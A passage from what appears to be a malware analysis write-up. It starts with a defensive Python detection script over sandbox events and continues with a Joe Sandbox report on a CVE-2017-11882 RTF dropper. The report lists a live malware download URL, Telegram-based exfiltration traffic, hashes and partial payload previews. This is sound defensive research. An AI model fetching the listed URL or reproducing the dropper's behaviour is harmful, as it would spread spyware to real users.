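        ev = by_pid[pid]
        chain.append(basename(ev["image"]))
        last_parent = basename(ev["parent_image"])
        pid = ev["ppid"]
    if last_parent is not None:
        chain.append(last_parent)
    return chain


# Constructed events reproducing the graph above (see the lead-in for which
# values are taken from the report and which are assumed).
WINWORD = r"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"
EQNEDT = r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
SVCHOST = r"C:\Windows\System32\svchost.exe"
DROPPED = r"C:\Users\user\AppData\Roaming\gudostrp.exe"
CHROME = r"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"
SAMPLE_EVENTS = [
    {"type": "process", "pid": 1328, "ppid": 1900, "image": WINWORD, "parent_image": r"C:\Windows\explorer.exe"},
    {"type": "process", "pid": 1976, "ppid": 1004, "image": EQNEDT, "parent_image": SVCHOST},
    {"type": "network", "pid": 1976, "image": EQNEDT, "dest_host": "palangavra.lt", "dest_ip": "144.76.47.167", "dest_port": 80},
    {"type": "file", "pid": 1976, "image": EQNEDT, "target": DROPPED},
    {"type": "process", "pid": 1212, "ppid": 1976, "image": DROPPED, "parent_image": EQNEDT},
    {"type": "process", "pid": 2576, "ppid": 1212, "image": DROPPED, "parent_image": DROPPED},
    {"type": "network", "pid": 2576, "image": DROPPED, "dest_host": "api.telegram.org", "dest_ip": "149.154.167.220", "dest_port": 443},
    {"type": "network", "pid": 3320, "image": CHROME, "dest_host": "api.telegram.org", "dest_ip": "149.154.167.220", "dest_port": 443},
]

if __name__ == "__main__":
    for rule, pid, detail in detect(SAMPLE_EVENTS):
        print("%-32s pid=%-5d %s" % (rule, pid, detail))
    print("chain:", " <- ".join(ancestry(SAMPLE_EVENTS, 2576)))
```

Note that EQNEDT32.EXE is not a child of WINWORD.EXE in the tree: the Equation Editor is activated through COM, so the two appear as siblings in the graph, and any rule that keys on a WINWORD.EXE parent would miss the whole chain. The Equation Editor rules fire on the first three edges alone, which is why the Sigma rules for EQNEDT32.EXE network and file activity catch CVE-2017-11882 droppers before any payload runs.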


                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

Source | Detection | Scanner | Label
Purchase Order_0131021.doc | 37% | Virustotal | (none)
Purchase Order_0131021.doc | 36% | ReversingLabs | Document-RTF.Exploit.CVE-2017-11882

                      Dropped Files

Source | Detection | Scanner
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\gufoxqa[1].exe | 100% | Joe Sandbox ML
C:\Users\user\AppData\Roaming\gudostrp.exe | 100% | Joe Sandbox ML

                      Unpacked PE Files

Source | Detection | Scanner | Label
5.2.gudostrp.exe.400000.1.unpack | 100% | Avira | HEUR/AGEN.1138205

                      Domains

                      No Antivirus matches

                      URLs

Source | Detection | Scanner | Label
http://127.0.0.1:HTTP/1.1 | 0% | Avira URL Cloud | safe
http://SwonTwAJYn3XCAV3.net | 0% | Avira URL Cloud | safe
http://DynDns.comDynDNS | 0% | URL Reputation | safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | 0% | URL Reputation | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | 0% | URL Reputation | safe
http://ocsp.entrust.net03 | 0% | URL Reputation | safe
https://api.telegram.orgP | 0% | Avira URL Cloud | safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | 0% | URL Reputation | safe
http://www.%s.comPA | 0% | URL Reputation | safe
http://www.diginotar.nl/cps/pkioverheid0 | 0% | URL Reputation | safe
http://ocsp.entrust.net0D | 0% | URL Reputation | safe
http://palangavra.lt/jukiestay/gufoxqa.exe | 100% | Avira URL Cloud | malware
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | 0% | URL Reputation | safe
http://yBlQIu.com | 0% | Avira URL Cloud | safe

                      Domains and IPs

                      Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
api.telegram.org | 149.154.167.220 | true | false | (none) | high
palangavra.lt | 144.76.47.167 | true | true | (none) | unknown

                          Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://palangavra.lt/jukiestay/gufoxqa.exe | true | Avira URL Cloud: malware | unknown

                          URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation

The entries below are strings carved from process memory dumps, so trailing characters such as 0, 03, 0D, P or PA are adjacent bytes rather than part of the URL, and http://www.%s.com is a format template rather than a literal host.

http://127.0.0.1:HTTP/1.1 | gudostrp.exe, 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
http://SwonTwAJYn3XCAV3.net | gudostrp.exe, 00000005.00000002.722361543.000000000238D000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://DynDns.comDynDNS | gudostrp.exe, 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | gudostrp.exe, 00000005.00000002.722766905.0000000005CF0000.00000002.00020000.sdmp | false | (none) | high
https://api.telegram.org | gudostrp.exe, 00000005.00000002.722427631.00000000023EC000.00000004.00000001.sdmp | false | (none) | high
http://crl.entrust.net/server1.crl0 | gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmp | false | (none) | high
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | gudostrp.exe, 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://ocsp.entrust.net03 | gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://api.telegram.orgP | gudostrp.exe, 00000005.00000002.722427631.00000000023EC000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.%s.comPA | gudostrp.exe, 00000005.00000002.722766905.0000000005CF0000.00000002.00020000.sdmp | false | URL Reputation: safe | low
http://www.diginotar.nl/cps/pkioverheid0 | gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://api.telegram.org | gudostrp.exe, 00000005.00000002.722444907.00000000023FF000.00000004.00000001.sdmp | false | (none) | high
http://ocsp.entrust.net0D | gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | gudostrp.exe, 00000005.00000002.722427631.00000000023EC000.00000004.00000001.sdmp | false | (none) | high
https://secure.comodo.com/CPS0 | gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmp | false | (none) | high
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | gudostrp.exe, 00000004.00000002.464298353.00000000031C9000.00000004.00000001.sdmp, gudostrp.exe, 00000005.00000002.721925198.0000000000402000.00000040.00000001.sdmp | false | URL Reputation: safe | unknown
http://yBlQIu.com | gudostrp.exe, 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.entrust.net/2048ca.crl0 | gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmp | false | (none) | high

                                        Contacted IPs


                                        Public

IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
144.76.47.167 | palangavra.lt | Germany | 24940 | HETZNER-ASDE | true

                                        General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 502700
Start date: 14.10.2021
Start time: 10:22:11
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 8m 18s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: Purchase Order_0131021.doc
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 7
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winDOC@6/9@3/2
EGA Information: Failed
HDC Information: Failed
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 0
• Number of non-executed functions: 0
                                        Cookbook Comments:
                                        • Adjust boot time
                                        • Enable AMSI
                                        • Found application associated with file extension: .doc
                                        • Found Word or Excel or PowerPoint or XPS Viewer
                                        • Attach to Office via COM
                                        • Scroll down
                                        • Close Viewer
                                        Warnings:
                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
                                        • TCP Packets have been reduced to 100
                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.

                                        Simulations

                                        Behavior and APIs

Time | Type | Description
10:22:15 | API Interceptor | 392x Sleep call for process: EQNEDT32.EXE modified
10:22:17 | API Interceptor | 1408x Sleep call for process: gudostrp.exe modified

                                        Joe Sandbox View / Context

                                        IPs

Match | Associated Sample Name / URL | Detection
149.154.167.220 | SecuriteInfo.com.Suspicious.Win32.Save.a.2604.exe | malicious
149.154.167.220 | ek3dgxlAe0.exe | malicious
149.154.167.220 | invoice.exe | malicious
149.154.167.220 | Ff24G0gf7c.exe | malicious
149.154.167.220 | Preliminary Closing Statement and Fully Executed PSA for #U20ac 520k Released.html | malicious
149.154.167.220 | Nuevo pedido de consulta cotizacin.xlsx | malicious
149.154.167.220 | 21ITQXL080104122T7.exe | malicious
149.154.167.220 | SWIFT_BANKTIA_729928920222.exe | malicious
149.154.167.220 | R0987653400008789.exe | malicious
149.154.167.220 | T98765434567898.exe | malicious
149.154.167.220 | LbmGlrja1Z.exe | malicious
149.154.167.220 | photos jpg.exe | malicious
149.154.167.220 | mGaZYvxAsr.exe | malicious
149.154.167.220 | vbyltST1At.exe | malicious
149.154.167.220 | PO B 12.exe | malicious
149.154.167.220 | DHL Shipping Documents REF - WAYBILL 44 7611 9546.exe | malicious
149.154.167.220 | 1st file name DHL - WAYBILL 44 7611 9546.exe | malicious
149.154.167.220 | DHL Shipping Documents REF - WAYBILL 44 7611 9546.pdf.exe | malicious
149.154.167.220 | PRESUPUESTO.xlsx | malicious
149.154.167.220 | Message bounce.exe | malicious

                                                                                Domains

Match | Associated Sample Name / URL | Detection | Context (IP)
api.telegram.org | SecuriteInfo.com.Suspicious.Win32.Save.a.2604.exe | malicious | 149.154.167.220
api.telegram.org | presupuesto.xlsx | malicious | 149.154.167.220
api.telegram.org | ek3dgxlAe0.exe | malicious | 149.154.167.220
api.telegram.org | invoice.exe | malicious | 149.154.167.220
api.telegram.org | Ff24G0gf7c.exe | malicious | 149.154.167.220
api.telegram.org | Preliminary Closing Statement and Fully Executed PSA for #U20ac 520k Released.html | malicious | 149.154.167.220
api.telegram.org | Nuevo pedido de consulta cotizacin.xlsx | malicious | 149.154.167.220
api.telegram.org | 21ITQXL080104122T7.exe | malicious | 149.154.167.220
api.telegram.org | SWIFT_BANKTIA_729928920222.exe | malicious | 149.154.167.220
api.telegram.org | R0987653400008789.exe | malicious | 149.154.167.220
api.telegram.org | T98765434567898.exe | malicious | 149.154.167.220
api.telegram.org | LbmGlrja1Z.exe | malicious | 149.154.167.220
api.telegram.org | photos jpg.exe | malicious | 149.154.167.220
api.telegram.org | mGaZYvxAsr.exe | malicious | 149.154.167.220
api.telegram.org | vbyltST1At.exe | malicious | 149.154.167.220
api.telegram.org | PO B 12.exe | malicious | 149.154.167.220
api.telegram.org | DHL Shipping Documents REF - WAYBILL 44 7611 9546.exe | malicious | 149.154.167.220
api.telegram.org | 1st file name DHL - WAYBILL 44 7611 9546.exe | malicious | 149.154.167.220
api.telegram.org | DHL Shipping Documents REF - WAYBILL 44 7611 9546.pdf.exe | malicious | 149.154.167.220
api.telegram.org | PRESUPUESTO.xlsx | malicious | 149.154.167.220

ASN

Match: TELEGRAMRU
Associated Sample Name / URL | Detection | Context
6GKjXSaJ8E.exe | malicious | 149.154.167.99
SecuriteInfo.com.Suspicious.Win32.Save.a.2604.exe | malicious | 149.154.167.220
ek3dgxlAe0.exe | malicious | 149.154.167.220
invoice.exe | malicious | 149.154.167.220
Ff24G0gf7c.exe | malicious | 149.154.167.220
Preliminary Closing Statement and Fully Executed PSA for € 520k Released.html | malicious | 149.154.167.220
Nuevo pedido de consulta cotizacin.xlsx | malicious | 149.154.167.220
21ITQXL080104122T7.exe | malicious | 149.154.167.220
JetCe3om9L.exe | malicious | 149.154.167.99
frj4kNTbl3.exe | malicious | 149.154.167.99
F6RhtCVeTD.exe | malicious | 149.154.167.99
SWIFT_BANKTIA_729928920222.exe | malicious | 149.154.167.220
R0987653400008789.exe | malicious | 149.154.167.220
T98765434567898.exe | malicious | 149.154.167.220
LbmGlrja1Z.exe | malicious | 149.154.167.220
photos jpg.exe | malicious | 149.154.167.220
ET13QJzgLL.exe | malicious | 149.154.167.99
mGaZYvxAsr.exe | malicious | 149.154.167.220
install.exe | malicious | 149.154.167.99
vbyltST1At.exe | malicious | 149.154.167.220

Match: HETZNER-ASDE
Associated Sample Name / URL | Detection | Context
Ajánlatkérés 2021.xlsm | malicious | 136.243.159.53
vbc.exe | malicious | 116.202.174.203
GR01DtRd0N.exe | malicious | 88.99.75.82
Payment_Swift,png.exe | malicious | 78.46.56.160
PO 211011-021A.exe | malicious | 136.243.159.53
S27f5MP8Ue | malicious | 5.75.211.8
75lT7DuXrs.exe | malicious | 168.119.93.163
📞-youse.guia-644-46204-282109.htm | malicious | 95.217.53.76
6Vk012xoyn | malicious | 144.79.90.35
tmDSSwkOAM | malicious | 94.130.40.209
8r3HRghvXX | malicious | 95.217.66.142
ARK Survival legit hack by Spyro.exe | malicious | 135.181.170.169
M12s7KNFDg.exe | malicious | 138.201.79.103
NBA 2K21 Cheat by Spyro.exe | malicious | 135.181.170.169
Gsdqz.dll | malicious | 116.203.98.109
4tOOUNDwaW.exe | malicious | 188.34.163.98
7ofFMoirr5.exe | malicious | 188.34.163.98
HUTWMrDhov.dll | malicious | 116.203.98.109
SecuriteInfo.com.W32.AIDetect.malware1.10225.exe | malicious | 188.34.163.98
0q3K4qJqQT.exe | malicious | 88.99.75.82

JA3 Fingerprints

Match: 36f7277af969a6947a61ae0b815907a1
Associated Sample Name / URL | Detection | Context
Order EQE0905.xlsx | malicious | 149.154.167.220
Nuevo pedido de consulta cotizacin.xlsx | malicious | 149.154.167.220
Order EQE090.xlsx | malicious | 149.154.167.220
PO2008095.xlsx | malicious | 149.154.167.220
Order List.xlsx | malicious | 149.154.167.220
PRESUPUESTO.xlsx | malicious | 149.154.167.220
DHL Original Documents.xlsx | malicious | 149.154.167.220
Purchase Order List.xlsm | malicious | 149.154.167.220
img_Especificación_07102021.doc | malicious | 149.154.167.220
Purchase Order_0190.doc__.rtf | malicious | 149.154.167.220
PO. 2100002.xlsx | malicious | 149.154.167.220
PRESUPUESTO.xlsx | malicious | 149.154.167.220
04OCT2021-USD-178,750.00.xlsx | malicious | 149.154.167.220
TT remittance.xlsx | malicious | 149.154.167.220
TT form.xlsx | malicious | 149.154.167.220
04OCT2021-USD-178,750.00.xlsx | malicious | 149.154.167.220
especificación 0021.doc | malicious | 149.154.167.220
RF Quotation_04102021.doc | malicious | 149.154.167.220
SteelTrading PO-5579.xlsx.xlsx | malicious | 149.154.167.220
IMG_PO-000120741.doc | malicious | 149.154.167.220

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\gufoxqa[1].exe
Process: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: downloaded
Size (bytes): 486912
Entropy (8bit): 6.778690362170083
Encrypted: false
SSDEEP: 12288:SEIG72hsEtDtc2gksrW6p8/PNvX3ivqINRb:EKoDtFFsrE/VP3ivqINRb
MD5: BC5F0AA0262021DB5921D726F7A5B820
SHA1: B41245E3BBFC8A7905BFC56B88EA79975595F4F6
SHA-256: B227A0AE42AA451635BCE6E3D50A05D895A3B6FA479B6882A548721A38091F25
SHA-512: A62ABA917BE2EEC67B82CF15A09EC34F8BB2D94098C0674858081B6B075E10E1195DB1947CAD445FFEBF4503BFAAD55EFF861DE93B81BBFB57163B7592E9C114
Malicious: true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation: low
IE Cache URL: http://palangavra.lt/jukiestay/gufoxqa.exe
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....ga.................V..........>t... ........@.. ....................................@..................................s..S.................................................................................... ............... ..H............text...DT... ...V.................. ..`.rsrc................X..............@..@.reloc...............l..............@..B................ t......H...........X.......\....E...b..........................................Ivan Medvedev...2~'....(....*..(....*2~5....(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*R~;....(.....{......*..{....*"..}....*..{....*"..}....*..{....*"..}....*.~>...~<....(....r.E.p~=....(....(....*..{....*"..}....*..{....*"..}....*N.(....~?.....(....*..{....*"..}....*.~>...~@....(....r.E.p~B...r.F.p~A....(.....d...(....(....*>..(O.....}....*>.{.....{....Zl*>..(O.....}....*f.{.....{....Zl#.-

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4877C7E7-A321-4438-A27A-0B7C6E560902}.tmp
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 2560
Entropy (8bit): 2.8100989291245866
Encrypted: false
SSDEEP: 24:IrpyUcwqII99iCDYNR6roVgJReOUyOoX6S66QLsQlNbOa4ZXk/cub505unG:IFyYjI/asJReKOof41b7iZuG
MD5: 2BDACAB3747178F7E0A6F4D7A31F6D11
SHA1: C437C2836EAA2A00BBBA64EC08E0BB40FE4478C8
SHA-256: 3C1F78FABA6BDA5501E0019283F0D25EA06A379B24D2E8C1CA790B6749A08D89
SHA-512: E388641848DDE78678FA3E5F089F66D0AFE7EAE6F19950BBF944D2F4A7144A4F2339990A95A13B6FC241575ECD43E8337FABA23A9255972E452CD27BDB043A3F
Malicious: false
Reputation: low
Preview: -.@.#.+.+.`.5.9.8...?.6...[.?...?.!.).7.[.=.(.+.(.*.../.*.9.1.%.6.[.%.9.!.|.8.:.=.`.;.%.^.$.*.?.#.;.'.*.6.[.1.3.)._.<.#.'...^.&...#.~.&.,._.2.(./.;.4.0.?.5...../.,.;.@.^.%.0.-.^.^.-.<.6.7.*.0.8.&./.5.<.;.[.~./.=.$.5.&.3.:.*.%.`.1...5.$.-.>.[.*.?.-.8.`.9.5.?./.'.%...7.(.<.5.1.@...#.^.?.3.!.[.!.'.'.9.%.%.%.~.?.].?.9.!.|.%.3.*.0.+.[...2.?.?.0.).+.|.-.&._.&.(.%...0.:.%.0...4.%.+.4.[.-...?.-.3.6.%.-.8.'.?...).?...-.=.).2.!.0...[.6...9.+.1...=.7.0.<.`.%...+.4.`.>.#.(...9.#.2.?.^.3.-.5.>.2.=.0.,._.`.@.#.#.?.<.5.,.).1.5.<.&...0.~./.%.[.%.0.,.,.$.+./.).8.+...8.9.3.?.^.'.1.:.1.3.=.)...!.(.?...`...+.,.?.2.<.4.-.>.`.(.?...5..._...>.~._...2.8.@.|.'.4.7.].3.%.].=.1.%.?.#.6.1...?.).(.;.~.9.#.>...@.%.0.).!.=.(.3.,.8.[.2.$.#.;.-.>.-.9.8.0.#.+./.'.?.(.....9.7.9.~...).-.@.=.[.@.4.0...?.[...3.?.1.2.4.@.?.~.&.(.7.9.#.;.3.1._._.].6.>.^.'.+.7.5.?.]...+.#.3.6.,.^.@.@.=.~.2.7.<.7.|.?.+.#.|.`...*.,.6.7.|.!.%.!.%./.,.?.$.,.9.?.:.]...9.<.=.4...+.#.9.1.).@.3.*.-...7.>.].#.*.2.-.?.>.!.?.(.[.@.:.~.].$.*.~.2...*.1.~.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{FF3D13C6-F9AF-46D5-857E-918FB2A2DE9E}.tmp
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 1024
Entropy (8bit): 0.05390218305374581
Encrypted: false
SSDEEP: 3:ol3lYdn:4Wn
MD5: 5D4D94EE7E06BBB0AF9584119797B23A
SHA1: DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256: 4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512: 95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious: false
Reputation: high, very likely benign file
Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Purchase Order_0131021.LNK
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 30 20:08:56 2021, mtime=Mon Aug 30 20:08:56 2021, atime=Thu Oct 14 16:22:13 2021, length=15658, window=hide
Category: dropped
Size (bytes): 1074
Entropy (8bit): 4.525345332508347
Encrypted: false
SSDEEP: 24:8CQ/XTTc+b+QROsdeoZROsiDv3qHwqE/7Eg:8n/XTA+y+OMLOmHTWB
MD5: 5553B96A2ED8B4558BACEB47D38C1748
SHA1: 70A0DA9820F6E3C5E755B8BD90B20705058049F0
SHA-256: 03E1FC72B2CDD61EBC996E5C2F95D4785502F121B329015D72F3B4597FDA7271
SHA-512: 2EE72D13C088478A3AE2CE0122586228C2A4BEB0C9CBE54008FF7334ECC25E50AB8D347D36EDF6ABAE9ACAA3D14748FAA1BF710A2AC17934D756E7A9693E0C81
Malicious: false
Reputation: low
Preview: L..................F.... .....>.....>...=... ...*=...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......S....user.8......QK.X.S..*...&=....U...............A.l.b.u.s.....z.1......S ...Desktop.d......QK.X.S .*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....~.2.*=..NS. .PURCHA~1.DOC..b.......S...S..*.........................P.u.r.c.h.a.s.e. .O.r.d.e.r._.0.1.3.1.0.2.1...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\579569\Users.user\Desktop\Purchase Order_0131021.doc.1.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.P.u.r.c.h.a.s.e. .O.r.d.e.r._.0.1.3.1.0.2.1...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......579569....

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 95
Entropy (8bit): 4.77019537852511
Encrypted: false
SSDEEP: 3:bDuMJlt34qxpulmX1aWN4qxpulv:bCmoopuPNopu1
MD5: AD3C75BA1EBB2EB0F34E5EDABE1344B8
SHA1: EC8A7EADE69E7CB6FA86D3ACC021470E8186E57B
SHA-256: 84A877A95B14C0E7DDE0A99EB2BF9E56BC85130998E5F2DC3BBF6E4D47AF6F8F
SHA-512: 462AE39D68A4D7A498C2AE2E7AF1C8AEDFC83D0C4A858E86C6A58E44973D8152B89864B3F8049E6E65E3CC695EF29F5A73D46D280507550CA4AFDF8FA6CAB3D1
Malicious: false
Reputation: low
Preview: [folders]..Templates.LNK=0..Purchase Order_0131021.LNK=0..[doc]..Purchase Order_0131021.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 162
Entropy (8bit): 2.5038355507075254
Encrypted: false
SSDEEP: 3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
MD5: 45B1E2B14BE6C1EFC217DCE28709F72D
SHA1: 64E3E91D6557D176776A498CF0776BE3679F13C3
SHA-256: 508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
SHA-512: 2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
Malicious: false
Reputation: moderate, very likely benign file
Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: Little-endian UTF-16 Unicode text, with no line terminators
Category: dropped
Size (bytes): 2
Entropy (8bit): 1.0
Encrypted: false
SSDEEP: 3:Qn:Qn
MD5: F3B25701FE362EC84616A93A45CE9998
SHA1: D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256: B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512: 98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious: false
Reputation: high, very likely benign file
Preview: ..

C:\Users\user\AppData\Roaming\gudostrp.exe
Process: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 486912
Entropy (8bit): 6.778690362170083
Encrypted: false
SSDEEP: 12288:SEIG72hsEtDtc2gksrW6p8/PNvX3ivqINRb:EKoDtFFsrE/VP3ivqINRb
MD5: BC5F0AA0262021DB5921D726F7A5B820
SHA1: B41245E3BBFC8A7905BFC56B88EA79975595F4F6
SHA-256: B227A0AE42AA451635BCE6E3D50A05D895A3B6FA479B6882A548721A38091F25
SHA-512: A62ABA917BE2EEC67B82CF15A09EC34F8BB2D94098C0674858081B6B075E10E1195DB1947CAD445FFEBF4503BFAAD55EFF861DE93B81BBFB57163B7592E9C114
Malicious: true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation: low
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....ga.................V..........>t... ........@.. ....................................@..................................s..S.................................................................................... ............... ..H............text...DT... ...V.................. ..`.rsrc................X..............@..@.reloc...............l..............@..B................ t......H...........X.......\....E...b..........................................Ivan Medvedev...2~'....(....*..(....*2~5....(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*R~;....(.....{......*..{....*"..}....*..{....*"..}....*..{....*"..}....*.~>...~<....(....r.E.p~=....(....(....*..{....*"..}....*..{....*"..}....*N.(....~?.....(....*..{....*"..}....*.~>...~@....(....r.E.p~B...r.F.p~A....(.....d...(....(....*>..(O.....}....*>.{.....{....Zl*>..(O.....}....*f.{.....{....Zl#.-

C:\Users\user\Desktop\~$rchase Order_0131021.doc
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 162
                                                                                Entropy (8bit):2.5038355507075254
                                                                                Encrypted:false
                                                                                SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                                                                MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                                                                SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                                                                SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                                                                SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                                                                Malicious:false
                                                                                Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                                                                Static File Info

                                                                                General

                                                                                File type:Rich Text Format data, unknown version
                                                                                Entropy (8bit):3.45414279609642
                                                                                TrID:
                                                                                • Rich Text Format (5005/1) 55.56%
                                                                                • Rich Text Format (4004/1) 44.44%
                                                                                File name:Purchase Order_0131021.doc
                                                                                File size:15658
                                                                                MD5:fc66be4a9696798aff0be8ed97bd294f
                                                                                SHA1:cf158b670ec831531a233d41872d1a9ee3850ff1
